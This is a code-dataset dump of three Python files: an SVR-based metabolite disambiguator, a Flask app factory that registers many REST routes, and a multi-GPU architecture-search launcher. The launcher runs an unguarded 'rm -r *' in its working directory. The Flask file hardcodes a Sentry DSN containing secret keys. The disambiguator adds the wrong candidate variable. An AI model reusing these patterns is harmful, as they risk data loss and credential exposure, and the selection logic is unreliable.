"usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.database_size", "line_number": 55, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 55, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.placed_candidates", "line_number": 56, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 56, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.margin", "line_number": 57, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 57, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.markup", "line_number": 58, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 58, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 60, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 61, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 61, "usage_type": "name"}, {"api_name": "app.models.Domain.name", "line_number": 61, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 61, "usage_type": "name"}, {"api_name": "app.models.SupplierDomain.price_status", "line_number": 62, "usage_type": "attribute"}, {"api_name": "app.models.SupplierDomain", "line_number": 62, "usage_type": "name"}, {"api_name": "app.models.Domain.price_minimum", "line_number": 63, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 63, "usage_type": "name"}, {"api_name": "app.models.Domain.price_maximum", "line_number": 64, "usage_type": 
"attribute"}, {"api_name": "app.models.Domain", "line_number": 64, "usage_type": "name"}, {"api_name": "app.models.Domain.criteria_needed", "line_number": 65, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 65, "usage_type": "name"}, {"api_name": "app.models.SupplierDomain.supplier_id", "line_number": 73, "usage_type": "attribute"}, {"api_name": "app.models.SupplierDomain", "line_number": 73, "usage_type": "name"}, {"api_name": "app.db.session.query", "line_number": 78, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 78, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 78, "usage_type": "name"}, {"api_name": "app.models.Product.supplier_code", "line_number": 81, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 81, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_agg", "line_number": 82, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 82, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 83, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 83, "usage_type": "name"}, {"api_name": "app.models.Product.name", "line_number": 84, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 84, "usage_type": "name"}, {"api_name": "app.models.Product.summary", "line_number": 85, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 85, "usage_type": "name"}, {"api_name": "app.models.Product.website", "line_number": 86, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 86, "usage_type": "name"}, {"api_name": "app.models.Product.pricing", "line_number": 87, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 87, "usage_type": "name"}, {"api_name": "app.models.Product.supplier_code", "line_number": 91, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 91, "usage_type": "name"}, {"api_name": "app.db.session.query", "line_number": 96, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 96, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 96, "usage_type": "name"}, {"api_name": "app.models.Address.supplier_code", "line_number": 99, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 99, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_agg", "line_number": 100, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 100, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 101, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 101, "usage_type": "name"}, {"api_name": "app.models.Address.address_line", "line_number": 102, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 102, "usage_type": "name"}, {"api_name": "app.models.Address.suburb", "line_number": 103, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 103, "usage_type": "name"}, {"api_name": "app.models.Address.state", "line_number": 104, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 104, "usage_type": "name"}, {"api_name": "app.models.Address.postal_code", "line_number": 105, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 105, "usage_type": "name"}, {"api_name": "app.models.Address.supplier_code", "line_number": 109, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 
109, "usage_type": "name"}, {"api_name": "app.db.session.query", "line_number": 114, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 114, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 114, "usage_type": "name"}, {"api_name": "app.models.Supplier.code", "line_number": 117, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 117, "usage_type": "name"}, {"api_name": "app.models.Supplier.name", "line_number": 118, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 118, "usage_type": "name"}, {"api_name": "app.models.Supplier.abn", "line_number": 119, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 119, "usage_type": "name"}, {"api_name": "app.models.Supplier.status", "line_number": 120, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 120, "usage_type": "name"}, {"api_name": "app.models.Supplier.creation_time.label", "line_number": 121, "usage_type": "call"}, {"api_name": "app.models.Supplier.creation_time", "line_number": 121, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 121, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 122, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 122, "usage_type": "name"}, {"api_name": "app.models.Supplier.website", "line_number": 123, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 123, "usage_type": "name"}, {"api_name": "app.models.Supplier.linkedin", "line_number": 124, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 124, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 125, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 125, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 126, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 126, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 127, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 127, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 128, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 128, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 129, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 129, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 130, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 130, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 131, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 131, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 132, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 132, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 133, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 133, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 134, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 134, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 135, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 135, "usage_type": 
"name"}, {"api_name": "app.models.Supplier.data", "line_number": 136, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 136, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 137, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 137, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 138, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 138, "usage_type": "name"}, {"api_name": "app.models.Supplier.id", "line_number": 143, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 143, "usage_type": "name"}, {"api_name": "app.models.Supplier.code", "line_number": 144, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 144, "usage_type": "name"}, {"api_name": "app.models.Supplier.code", "line_number": 145, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 145, "usage_type": "name"}, {"api_name": "app.models.Supplier.code", "line_number": 146, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 146, "usage_type": "name"}]} +{"seq_id": "5086573", "text": "import io\nimport json\nimport imp\nimport pprint\nimport warnings\nimport math\nfrom numpy import *\nfrom sklearn.svm import SVR\nimport pylab as pl\n\nimp.load_source('ols', '../ols.py')\nfrom ols import ols\n\nclass MetaboliteCandidate:\n keggID = 0\n props = {}\n\n def __init__(self, theKeggID, theProps):\n self.keggID = theKeggID\n self.props = theProps\n\nclass Disambiguator:\n model = None\n svr_rbf = None\n xMatrix = []\n yVector = []\n inUseCandidates = []\n ambiguities = {}\n keggIDToAmbiguityID = {}\n m = None\n maxScanIDPredictionError = 0.2\n mlrPropCombo = ['PUBCHEM_MOLECULAR_WEIGHT', 'PUBCHEM_EFFECTIVE_ROTOR_COUNT', 'PUBCHEM_MOLECULAR_WEIGHT', 'PUBCHEM_COVALENTLY_BONDED_UNIT_COUNT', 'PUBCHEM_MONOISOTOPIC_MASS', 'PUBCHEM_UNDEFINED_BOND_STEREOCENTER_COUNT', 'PUBCHEM_FORMAL_CHARGE']\n finalSampleSize = 0\n svr_C = 2 ** 10\n svr_gamma = 2 ** -11\n\n def __init__(self):\n\n ambiguitiesPropsFile = open('ambiguities.json', 'r')\n ambiguitiesPropsJSON = ambiguitiesPropsFile.read()\n rawAmbiguities = json.loads(ambiguitiesPropsJSON)\n\n for ambiguityID, ambiguityProps in rawAmbiguities.iteritems():\n scanID = ambiguityProps[\"scanid\"]\n metabolites = ambiguityProps[\"candidates\"]\n confident = ambiguityProps[\"confident\"]\n\n if ambiguityID not in self.ambiguities:\n self.ambiguities[ambiguityID] = {\n \"scanID\": scanID,\n \"candidates\": {},\n \"confident\": confident\n } \n\n for keggID, props in metabolites.iteritems():\n #this is super hackish, but it works\n #for each metabolite candidate, we set the ambiguity's scan id as a property on the metabolite candidate property list itself\n #that way, we can know the ambiguity's scan id without having to know the ambiguityid\n props[\"SUSPECTED_SCANTIME\"] = float(scanID)\n metabolite = MetaboliteCandidate(keggID, props)\n self.keggIDToAmbiguityID[keggID] = ambiguityID\n self.ambiguities[ambiguityID][\"candidates\"][keggID] = metabolite\n\n def disambiguate(self):\n self.svr_rbf = SVR(kernel='rbf', C=self.svr_C, gamma=self.svr_gamma)\n\n self.reset()\n #first build a model for masses with only a single candidate\n self.addAllConfidentCandidates()\n self.model = self.svr_rbf.fit(self.xMatrix, self.yVector)\n #next add the ambiguous ones\n self.addAllNonconfidentCandidates()\n yPred = self.model.predict(self.xMatrix)\n\n\n 
pl.scatter(self.yVector, yPred, c='red', label='raw')\n pl.hold('on')\n\n self.removeHighErrorCandidates()\n yPred = self.model.predict(self.xMatrix)\n #pl.scatter(self.yVector, yPred, c='green', label='filtered')\n\n pl.xlabel('recorded')\n pl.ylabel('predicted')\n pl.title('Support Vector Regression')\n pl.legend()\n pl.show()\n\n return len(self.inUseCandidates)\n\n def tryMLR(self):\n try:\n self.m = ols(array(self.yVector), array(self.xMatrix)) #, y_varnm = 'y', x_varnm = ['x1','x2','x3','x4','x5','x6','x7'])\n #self.m.summary()\n return True\n except:\n #print(\"error\")\n return False\n\n def addAllConfidentCandidates(self):\n for ambiguityID, ambiguityProps in self.ambiguities.iteritems():\n candidates = ambiguityProps[\"candidates\"]\n isConfident = int(ambiguityProps[\"confident\"])\n if isConfident == 1:\n candidate = candidates.itervalues().next()\n self.tryToAddMetabolite(candidate)\n\n def addAllNonconfidentCandidates(self):\n for ambiguityID, ambiguityProps in self.ambiguities.iteritems():\n candidates = ambiguityProps[\"candidates\"]\n isConfident = int(ambiguityProps[\"confident\"])\n if isConfident == 0:\n #choose the candidate whose elution time is closest to the predicted time\n closestCandidate = None\n smallestError = inf\n\n for candidate in candidates.itervalues():\n\n validCandidate = True\n props = candidate.props\n scanID = props[\"SUSPECTED_SCANTIME\"]\n lookedUpPropArr = []\n for prop in self.mlrPropCombo:\n if prop in props:\n val = props[prop]\n lookedUpPropArr.append(val)\n else:\n validCandidate = False\n break\n\n if validCandidate:\n predScanID = self.model.predict([lookedUpPropArr])\n rawError = fabs(predScanID - scanID)\n\n if closestCandidate == None or rawError < smallestError:\n closestCandidate = candidate\n smallestError = rawError\n \n if closestCandidate != None:\n self.tryToAddMetabolite(candidate)\n\n def removeHighErrorCandidates(self):\n quantity = len(self.inUseCandidates)\n i = 0\n while i < quantity:\n candidate = self.inUseCandidates[i]\n validCandidate = True\n props = candidate.props\n scanID = props[\"SUSPECTED_SCANTIME\"]\n lookedUpPropArr = []\n for prop in self.mlrPropCombo:\n if prop in props:\n val = props[prop]\n lookedUpPropArr.append(val)\n else:\n validCandidate = False\n del self.inUseCandidates[i]\n del self.yVector[i]\n del self.xMatrix[i]\n quantity -= 1\n i -= 1\n break\n\n if validCandidate:\n predScanID = self.model.predict([lookedUpPropArr])\n \n errorPct = fabs(predScanID - scanID) / float(scanID)\n if errorPct > self.maxScanIDPredictionError:\n del self.inUseCandidates[i]\n del self.yVector[i]\n del self.xMatrix[i]\n quantity -= 1\n i -= 1\n\n i += 1\n\n def tryToAddMetabolite(self, metabolite):\n #returns true if added, false if one or more properties were not found\n\n if not isinstance(metabolite, MetaboliteCandidate):\n return False\n\n knownProps = metabolite.props\n scanTime = knownProps['SUSPECTED_SCANTIME']\n xMatrixRow = []\n for prop in self.mlrPropCombo:\n if prop in knownProps:\n val = knownProps[prop]\n xMatrixRow.append(val)\n else:\n return False\n #all properties extant and added to matrix row\n self.inUseCandidates.append(metabolite)\n self.xMatrix.append(xMatrixRow)\n self.yVector.append(scanTime)\n return True\n\n\n def reset(self):\n self.inUseCandidates = []\n self.xMatrix = []\n self.yVector = []\n\n def printSummary(self):\n self.tryMLR()\n\n b = self.m.b\n summary = {}\n\n print(\"\")\n print(\"summary of all ambiguous metabolites:\")\n for ambiguityID, ambiguityProps in 
self.ambiguities.iteritems():\n candidates = ambiguityProps[\"candidates\"]\n\n for keggID, candidate in candidates.iteritems():\n addToSummary = True\n knownProps = candidate.props\n scanTime = knownProps['SUSPECTED_SCANTIME']\n lookedUpPropArr = []\n for prop in self.mlrPropCombo:\n if prop in knownProps:\n val = knownProps[prop]\n lookedUpPropArr.append(val)\n else:\n addToSummary = False\n break\n if addToSummary:\n yPred = b[0]\n for propIndex in range(0, len(lookedUpPropArr)):\n propVal = lookedUpPropArr[propIndex]\n propCoefficient = b[propIndex + 1]\n yPred += propCoefficient * propVal\n\n metaboliteSummary = {\n \"keggid\": keggID,\n \"scan\": scanTime,\n \"prediction\": yPred,\n \"error\": (math.fabs(scanTime - yPred) / scanTime)\n }\n if candidate in self.inUseCandidates:\n metaboliteSummary[\"chosen\"] = True\n\n summaryKey = \"ambiguity\" + str(ambiguityID)\n if summaryKey not in summary:\n summary[summaryKey] = []\n\n summary[summaryKey].append(metaboliteSummary)\n\n\n pp = pprint.PrettyPrinter()\n pp.pprint(summary)\n\n#sometimes scipy generates warnings, which usually means something went wrong and we might get bad data\n#to remedy this, switch all warnings to error, catch them when doing the multiple linear regression, and disregard that result\n#warnings.resetwarnings()\n#warnings.simplefilter('error')\n\nif __name__ == '__main__':\n disambiguator = Disambiguator()\n sampleSize = disambiguator.disambiguate()\n#disambiguator.printSummary()\n", "sub_path": "build_model/disambiguate_svr/disambiguate.py", "file_name": "disambiguate.py", "file_ext": "py", "file_size_in_byte": 9501, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "imp.load_source", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.svm.SVR", "line_number": 65, "usage_type": "call"}, {"api_name": "pylab.scatter", "line_number": 76, "usage_type": "call"}, {"api_name": "pylab.hold", "line_number": 77, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 83, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 84, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 85, "usage_type": "call"}, {"api_name": "pylab.legend", "line_number": 86, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 87, "usage_type": "call"}, {"api_name": "ols.ols", "line_number": 93, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 238, "usage_type": "call"}, {"api_name": "pprint.PrettyPrinter", "line_number": 250, "usage_type": "call"}]} +{"seq_id": "445873245", "text": "\n\"\"\"\n\nFlask app factory. 
Create the app and attach all libraries with create_app.\nAlso takes care of registering all routes, including API views.\n\nHandles a couple of different config scenarios, including Docker, CircleCI and testing.\n\n\"\"\"\n\nimport httplib\nimport wtforms_json\n\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask_admin import Admin, BaseView, AdminIndexView, expose\nfrom flask_admin.contrib.fileadmin import FileAdmin\nfrom flask_admin.contrib.sqla import ModelView\nfrom raven.contrib.flask import Sentry\n\nfrom sampleserve.core import db\nfrom sampleserve.v1 import (\n api,\n auth,\n labs,\n bplabs,\n roles,\n samples,\n uploads,\n substancegroups,\n substances,\n criterias,\n states,\n sites,\n sitedata,\n clients,\n schedules,\n schedulewelltests,\n contacts,\n users,\n get_user,\n get_lab,\n consultants,\n companies,\n managers,\n samplers,\n offices,\n wells,\n wellimages,\n frequencies,\n reports,\n imports,\n tests,\n testmaterials,\n sitemaps,\n sitemapwells,\n)\n\nfrom sampleserve.users.auth import (\n auth_manager,\n bcrypt,\n)\n\nfrom sampleserve.rest.errors import (\n UnprocessableEntity,\n handle_unprocessable_entity,\n BadRequest,\n handle_bad_request,\n handle_unauthorized,\n handle_page_not_found,\n handle_method_not_allowed,\n BadUpload,\n handle_bad_upload,\n BadInvite,\n handle_bad_invite,\n FormError,\n handle_form_error,\n)\nfrom sampleserve import mail\nfrom sampleserve.emails.helpers import firstname\n\nfrom sampleserve.admin.views import AdminModel, MyHomeView, UserView, SiteView\n\n\ndef register_api(app, view, url, pk='id', pk_type='int', **kwargs):\n app.add_url_rule(url, defaults={pk: None}, view_func=view, methods=['GET'], **kwargs)\n app.add_url_rule(url, view_func=view, methods=['POST'], **kwargs)\n app.add_url_rule('%s<%s:%s>' % (url, pk_type, pk), view_func=view, methods=['GET', 'PATCH', 'DELETE'], **kwargs)\n\n\ndef create_app():\n app = Flask(__name__)\n\n app.config.from_object('sampleserve.config.settings')\n\n # Turn off strict slashes\n app.url_map.strict_slashes = False\n\n # Initialize Flask_Mail\n mail.init_app(app)\n\n app.register_blueprint(api, url_prefix='/api/v1', subdomain='')\n app.register_blueprint(auth, url_prefix='/api/v1/auth', subdomain='')\n app.register_blueprint(reports, url_prefix='/api/v1/reports', subdomain='')\n app.register_blueprint(imports, url_prefix='/api/v1/imports', subdomain='')\n app.register_blueprint(bplabs, url_prefix='/api/v1/labs')\n\n register_api(app, labs, '/api/v1/labs/', subdomain='')\n register_api(app, roles, '/api/v1/roles/', subdomain='')\n register_api(app, samples, '/api/v1/samples/', subdomain='')\n register_api(app, substances, '/api/v1/substances/', subdomain='')\n register_api(app, substancegroups, '/api/v1/substancegroups/', subdomain='')\n register_api(app, substances, '/api/v1/substances/', subdomain='')\n register_api(app, criterias, '/api/v1/criterias/', subdomain='')\n register_api(app, states, '/api/v1/states/', subdomain='')\n register_api(app, sites, '/api/v1/sites/', subdomain='')\n register_api(app, sitedata, '/api/v1/sitedata/', subdomain='')\n register_api(app, clients, '/api/v1/clients/', subdomain='')\n register_api(app, uploads, '/api/v1/uploads/', subdomain='')\n register_api(app, schedules, '/api/v1/schedules/', subdomain='')\n register_api(app, schedulewelltests, '/api/v1/schedulewelltests/', subdomain='')\n register_api(app, contacts, '/api/v1/contacts/', subdomain='')\n register_api(app, users, '/api/v1/users/', subdomain='')\n register_api(app, consultants, 
'/api/v1/consultants/', subdomain='')\n register_api(app, companies, '/api/v1/companies/', subdomain='')\n register_api(app, managers, '/api/v1/managers/', subdomain='')\n register_api(app, samplers, '/api/v1/samplers/', subdomain='')\n register_api(app, offices, '/api/v1/offices/', subdomain='')\n register_api(app, wells, '/api/v1/wells/', subdomain='')\n register_api(app, wellimages, '/api/v1/wellimages/', subdomain='')\n register_api(app, frequencies, '/api/v1/frequencies/', subdomain='')\n register_api(app, tests, '/api/v1/tests/', subdomain='')\n register_api(app, testmaterials, '/api/v1/testmaterials/', subdomain='')\n register_api(app, sitemaps, '/api/v1/sitemaps/', subdomain='')\n register_api(app, sitemapwells, '/api/v1/sitemapwells/', subdomain='')\n\n app.add_url_rule('/api/v1/user', 'user', get_user, subdomain='')\n app.add_url_rule('/api/v1/lab', 'lab', get_lab, subdomain='')\n\n app.register_error_handler(UnprocessableEntity, handle_unprocessable_entity)\n app.register_error_handler(BadUpload, handle_bad_upload)\n app.register_error_handler(BadInvite, handle_bad_invite)\n app.register_error_handler(BadRequest, handle_bad_request)\n app.register_error_handler(httplib.NOT_FOUND, handle_page_not_found)\n app.register_error_handler(httplib.METHOD_NOT_ALLOWED, handle_method_not_allowed)\n app.register_error_handler(httplib.UNAUTHORIZED, handle_unauthorized)\n app.register_error_handler(FormError, handle_form_error)\n\n # register some custom app filters\n app.jinja_env.filters['firstname'] = firstname\n\n db.init_app(app)\n bcrypt.init_app(app)\n auth_manager.init_app(app)\n\n if app.config.get('DEBUG'):\n CORS(app, origins=app.config.get('CORS_SERVER_NAME'), supports_credentials=True)\n\n # Activate wtforms json helpers\n wtforms_json.init()\n\n # Activate sentry\n if not app.config.get('DEBUG'):\n sentry = Sentry(app, dsn='http://ded2865b70164ed58a18a82f3bc1d589:be268c2f50bd425f98acbe2e3f712317@sentry.nickwoodhams.com/19')\n\n return app\n", "sub_path": "sampleserve/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6012, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 92, "usage_type": "call"}, {"api_name": "sampleserve.mail.init_app", "line_number": 100, "usage_type": "call"}, {"api_name": "sampleserve.mail", "line_number": 100, "usage_type": "name"}, {"api_name": "sampleserve.v1.api", "line_number": 102, "usage_type": "argument"}, {"api_name": "sampleserve.v1.auth", "line_number": 103, "usage_type": "argument"}, {"api_name": "sampleserve.v1.reports", "line_number": 104, "usage_type": "argument"}, {"api_name": "sampleserve.v1.imports", "line_number": 105, "usage_type": "argument"}, {"api_name": "sampleserve.v1.bplabs", "line_number": 106, "usage_type": "argument"}, {"api_name": "sampleserve.v1.labs", "line_number": 108, "usage_type": "argument"}, {"api_name": "sampleserve.v1.roles", "line_number": 109, "usage_type": "argument"}, {"api_name": "sampleserve.v1.samples", "line_number": 110, "usage_type": "argument"}, {"api_name": "sampleserve.v1.substances", "line_number": 111, "usage_type": "argument"}, {"api_name": "sampleserve.v1.substancegroups", "line_number": 112, "usage_type": "argument"}, {"api_name": "sampleserve.v1.substances", "line_number": 113, "usage_type": "argument"}, {"api_name": "sampleserve.v1.criterias", "line_number": 114, "usage_type": "argument"}, {"api_name": "sampleserve.v1.states", "line_number": 115, "usage_type": "argument"}, 
{"api_name": "sampleserve.v1.sites", "line_number": 116, "usage_type": "argument"}, {"api_name": "sampleserve.v1.sitedata", "line_number": 117, "usage_type": "argument"}, {"api_name": "sampleserve.v1.clients", "line_number": 118, "usage_type": "argument"}, {"api_name": "sampleserve.v1.uploads", "line_number": 119, "usage_type": "argument"}, {"api_name": "sampleserve.v1.schedules", "line_number": 120, "usage_type": "argument"}, {"api_name": "sampleserve.v1.schedulewelltests", "line_number": 121, "usage_type": "argument"}, {"api_name": "sampleserve.v1.contacts", "line_number": 122, "usage_type": "argument"}, {"api_name": "sampleserve.v1.users", "line_number": 123, "usage_type": "argument"}, {"api_name": "sampleserve.v1.consultants", "line_number": 124, "usage_type": "argument"}, {"api_name": "sampleserve.v1.companies", "line_number": 125, "usage_type": "argument"}, {"api_name": "sampleserve.v1.managers", "line_number": 126, "usage_type": "argument"}, {"api_name": "sampleserve.v1.samplers", "line_number": 127, "usage_type": "argument"}, {"api_name": "sampleserve.v1.offices", "line_number": 128, "usage_type": "argument"}, {"api_name": "sampleserve.v1.wells", "line_number": 129, "usage_type": "argument"}, {"api_name": "sampleserve.v1.wellimages", "line_number": 130, "usage_type": "argument"}, {"api_name": "sampleserve.v1.frequencies", "line_number": 131, "usage_type": "argument"}, {"api_name": "sampleserve.v1.tests", "line_number": 132, "usage_type": "argument"}, {"api_name": "sampleserve.v1.testmaterials", "line_number": 133, "usage_type": "argument"}, {"api_name": "sampleserve.v1.sitemaps", "line_number": 134, "usage_type": "argument"}, {"api_name": "sampleserve.v1.sitemapwells", "line_number": 135, "usage_type": "argument"}, {"api_name": "sampleserve.v1.get_user", "line_number": 137, "usage_type": "argument"}, {"api_name": "sampleserve.v1.get_lab", "line_number": 138, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.UnprocessableEntity", "line_number": 140, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_unprocessable_entity", "line_number": 140, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.BadUpload", "line_number": 141, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_bad_upload", "line_number": 141, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.BadInvite", "line_number": 142, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_bad_invite", "line_number": 142, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.BadRequest", "line_number": 143, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_bad_request", "line_number": 143, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_page_not_found", "line_number": 144, "usage_type": "argument"}, {"api_name": "httplib.NOT_FOUND", "line_number": 144, "usage_type": "attribute"}, {"api_name": "sampleserve.rest.errors.handle_method_not_allowed", "line_number": 145, "usage_type": "argument"}, {"api_name": "httplib.METHOD_NOT_ALLOWED", "line_number": 145, "usage_type": "attribute"}, {"api_name": "sampleserve.rest.errors.handle_unauthorized", "line_number": 146, "usage_type": "argument"}, {"api_name": "httplib.UNAUTHORIZED", "line_number": 146, "usage_type": "attribute"}, {"api_name": "sampleserve.rest.errors.FormError", "line_number": 147, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_form_error", "line_number": 147, "usage_type": "argument"}, 
{"api_name": "sampleserve.emails.helpers.firstname", "line_number": 150, "usage_type": "name"}, {"api_name": "sampleserve.core.db.init_app", "line_number": 152, "usage_type": "call"}, {"api_name": "sampleserve.core.db", "line_number": 152, "usage_type": "name"}, {"api_name": "sampleserve.users.auth.bcrypt.init_app", "line_number": 153, "usage_type": "call"}, {"api_name": "sampleserve.users.auth.bcrypt", "line_number": 153, "usage_type": "name"}, {"api_name": "sampleserve.users.auth.auth_manager.init_app", "line_number": 154, "usage_type": "call"}, {"api_name": "sampleserve.users.auth.auth_manager", "line_number": 154, "usage_type": "name"}, {"api_name": "flask_cors.CORS", "line_number": 157, "usage_type": "call"}, {"api_name": "wtforms_json.init", "line_number": 160, "usage_type": "call"}, {"api_name": "raven.contrib.flask.Sentry", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "175641258", "text": "import os\nimport time\nimport multiprocessing\nimport moxing as mox\nimport numpy as np\n\n\ndataset = 'cifar10'\nmox.file.copy_parallel('s3://bucket-london2/DATASETS/' + dataset.upper(),'/cache/test')\nos.system('rm -r *')\n\nbase_name = '4444_final_cifar10_v1'\n\ndef single_run(seed, gpu):\n n_layers1 = 14\n n_layers2 = 20\n n_epochs1 = 76\n\n name = base_name + '_v' + str(gpu)\n\n os.system('python /cache/code/search.py --name {} --dataset {} --layers {} --epochs {} --seed {} --gpus {} --drop_rate 0.00003'\n .format(name, dataset, n_layers1, n_epochs1, seed, gpu))\n\n with open(os.path.join('searchs', name,'genotype.txt'), 'r') as f:\n genotype = f.read()\n\n os.system('python /cache/code/augment.py --name {} --dataset {} --seed {} --gpus {} --genotype \"{}\"'.\n format(name, dataset, seed, gpu, genotype))\n\n\nif __name__ == '__main__':\n \n processes = []\n for i in range(8):\n p = multiprocessing.Process(target=single_run, args=(i, i))\n processes.append(p)\n p.start()\n \n for p in processes:\n p.join()\n \n accs = []\n res_file = 'result_' + base_name + '.txt'\n with open(res_file, 'w') as res:\n for i in range(8):\n name = base_name + '_v' + str(i)\n with open(os.path.join('searchs', name, 'genotype.txt'), 'r') as f:\n genotype = f.read()\n with open(os.path.join('augments', name, name + '.log')) as f:\n lines = f.readlines()\n acc = lines[-1][-9:-3]\n accs.append(float(acc))\n \n res.write('{}\\t{}\\n'.format(acc, genotype))\n \n mean = np.mean(accs)\n std = np.std(accs)\n res.write('mean: {:.2f}\\tstd: {:.2f}\\n'.format(mean, std))\n \n mox.file.copy_parallel(res_file, os.path.join('s3://bucket-auto2/hongweijun/archive2/', res_file))\n\n\n", "sub_path": "start.py", "file_name": "start.py", "file_ext": "py", "file_size_in_byte": 1864, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "moxing.file.copy_parallel", "line_number": 9, "usage_type": "call"}, {"api_name": "moxing.file", "line_number": 9, 